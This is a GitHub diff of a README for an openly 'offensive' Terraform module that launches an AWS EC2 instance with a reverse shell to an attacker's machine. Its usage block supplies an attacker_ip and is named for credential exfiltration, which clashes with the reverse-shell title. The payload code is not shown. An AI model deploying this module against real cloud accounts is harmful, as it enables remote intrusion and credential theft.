File tree Expand file tree Collapse file tree 1 file changed +20
-1
lines changed Expand file tree Collapse file tree 1 file changed +20
-1
lines changed Original file line number Diff line number Diff line change 1- # terraform-aws-ec2-instance-reverse-shell
1+ # AWS EC2 Instance Reverse Shell Module
2+
3+ ![ OffensiveTerraform] ( https://img.shields.io/badge/hack-success )
4+ ![ OffensiveTerraform] ( https://img.shields.io/badge/offensive-terraform-blueviolet )
5+
6+ Offensive Terraform module which creates EC2 instance and reverse shell from an EC2 instance to attacker machine.
7+
8+ ![ Attack Diagram] ( https://raw.githubusercontent.com/offensive-terraform/terraform-aws-ec2-instance-reverse-shell/master/diagram.jpg )
9+
10+ ## Usage
11+ ```
12+ module "ec2_instance_credential_exfiltration" {
13+ source = "offensive-terraform/ec2-instance-credential-exfiltration/aws"
14+
15+ subnet_id = "subnet-0a4a1cc04"
16+ attacker_ip = "0.0.0.0"
17+ }
18+ ```
19+ ## Author
20+ Module managed by https://github.com/iganbold
You can’t perform that action at this time.
0 commit comments